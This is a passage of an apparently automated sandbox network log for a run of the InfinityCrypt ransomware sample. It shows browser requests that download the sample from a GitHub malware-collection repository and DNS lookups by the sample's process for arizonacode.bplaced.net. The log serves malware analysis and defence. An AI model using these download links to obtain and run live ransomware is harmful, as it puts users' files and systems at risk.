worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-github-request-id: C56E:2E84B3:182F73:1C513C:6797C278
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
                          x-requested-with: XMLHttpRequest
                          x-github-target: dotcom
                          x-react-router: json
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:34 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"7fbc3c2ea6367cf97352a8a09ddc784f"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 1945
                          x-github-request-id: C56E:2E84B3:18333D:1C55DA:6797C279
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/InfinityCrypt.zip
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/latest-commit/master/ransomwares/InfinityCrypt.zip HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:34 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"e61453a6d8b82727dfe87839b3fc469c"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 177
                          x-github-request-id: C56E:2E84B3:183365:1C560D:6797C27E
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/InfinityCrypt.zip
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/InfinityCrypt.zip HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:34 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"9090ba4bfc48226fcbbae06699613aa1"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 452
                          x-github-request-id: C56E:2E84B3:183365:1C560C:6797C27E
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/raw/refs/heads/master/ransomwares/InfinityCrypt.zip
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/raw/refs/heads/master/ransomwares/InfinityCrypt.zip HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 302
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:36 GMT
                          content-type: text/html; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          access-control-allow-origin:
                          location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/refs/heads/master/ransomwares/InfinityCrypt.zip
                          cache-control: no-cache
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-length: 0
                          x-github-request-id: C56E:2E84B3:1834C2:1C57A5:6797C27E
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          collector.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          collector.github.com
                          IN A
                          Response
                          collector.github.com
                          IN CNAME
                          glb-db52c2cf8be544.github.com
                          glb-db52c2cf8be544.github.com
                          IN A
                          140.82.114.22
                        • flag-us
                          DNS
                          glb-db52c2cf8be544.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          glb-db52c2cf8be544.github.com
                          IN A
                          Response
                          glb-db52c2cf8be544.github.com
                          IN A
                          140.82.113.21
                        • flag-us
                          DNS
                          glb-db52c2cf8be544.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          glb-db52c2cf8be544.github.com
                          IN A
                          Response
                          glb-db52c2cf8be544.github.com
                          IN A
                          140.82.113.21
                        • flag-us
                          DNS
                          glb-db52c2cf8be544.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          glb-db52c2cf8be544.github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          glb-db52c2cf8be544.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          glb-db52c2cf8be544.github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN A
                          Response
                          api.github.com
                          IN A
                          20.26.156.210
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN A
                          Response
                          api.github.com
                          IN A
                          20.26.156.210
                        • flag-gb
                          POST
                          https://api.github.com/_private/browser/stats
                          firefox.exe
                          Remote address:
                          20.26.156.210:443
                          Request
                          POST /_private/browser/stats HTTP/2.0
                          host: api.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          content-type: text/plain;charset=UTF-8
                          content-length: 562
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          date: Mon, 27 Jan 2025 17:29:25 GMT
                          content-type: text/plain
                          content-length: 0
                          cache-control: no-cache
                          x-ratelimit-limit: 60
                          x-ratelimit-remaining: 60
                          x-ratelimit-reset: 1738002565
                          x-ratelimit-used: 0
                          x-ratelimit-resource: core
                          x-github-media-type: github.v3; format=json
                          x-github-api-version-selected: 2022-11-28
                          access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
                          content-security-policy: default-src 'none'
                          vary: Accept-Encoding, Accept, X-Requested-With
                          server: github.com
                          x-github-request-id: C57F:1DF4D3:E655C:1191EE:6797C275
                        • flag-gb
                          POST
                          https://api.github.com/_private/browser/stats
                          firefox.exe
                          Remote address:
                          20.26.156.210:443
                          Request
                          POST /_private/browser/stats HTTP/2.0
                          host: api.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          content-type: text/plain;charset=UTF-8
                          content-length: 893
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          date: Mon, 27 Jan 2025 17:29:34 GMT
                          content-type: text/plain
                          content-length: 0
                          cache-control: no-cache
                          x-ratelimit-limit: 60
                          x-ratelimit-remaining: 60
                          x-ratelimit-reset: 1738002574
                          x-ratelimit-used: 0
                          x-ratelimit-resource: core
                          x-github-media-type: github.v3; format=json
                          x-github-api-version-selected: 2022-11-28
                          access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
                          content-security-policy: default-src 'none'
                          vary: Accept-Encoding, Accept, X-Requested-With
                          server: github.com
                          x-github-request-id: C57F:1DF4D3:E6836:11958C:6797C275
                        • flag-gb
                          POST
                          https://api.github.com/_private/browser/stats
                          firefox.exe
                          Remote address:
                          20.26.156.210:443
                          Request
                          POST /_private/browser/stats HTTP/2.0
                          host: api.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
                          content-type: text/plain;charset=UTF-8
                          content-length: 436
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          date: Mon, 27 Jan 2025 17:29:39 GMT
                          content-type: text/plain
                          content-length: 0
                          cache-control: no-cache
                          x-ratelimit-limit: 60
                          x-ratelimit-remaining: 60
                          x-ratelimit-reset: 1738002579
                          x-ratelimit-used: 0
                          x-ratelimit-resource: core
                          x-github-media-type: github.v3; format=json
                          x-github-api-version-selected: 2022-11-28
                          access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
                          content-security-policy: default-src 'none'
                          vary: Accept-Encoding, Accept, X-Requested-With
                          server: github.com
                          x-github-request-id: C57F:1DF4D3:E6A47:119846:6797C27E
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          arizonacode.bplaced.net
                          Endermanch@InfinityCrypt.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          arizonacode.bplaced.net
                          IN A
                          Response
                          arizonacode.bplaced.net
                          IN A
                          162.55.0.137
                        • flag-us
                          DNS
                          arizonacode.bplaced.net
                          Endermanch@InfinityCrypt.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          arizonacode.bplaced.net
                          IN A
                          Response
                          arizonacode.bplaced.net
                          IN A
                          162.55.0.137
                        • flag-de
                          GET
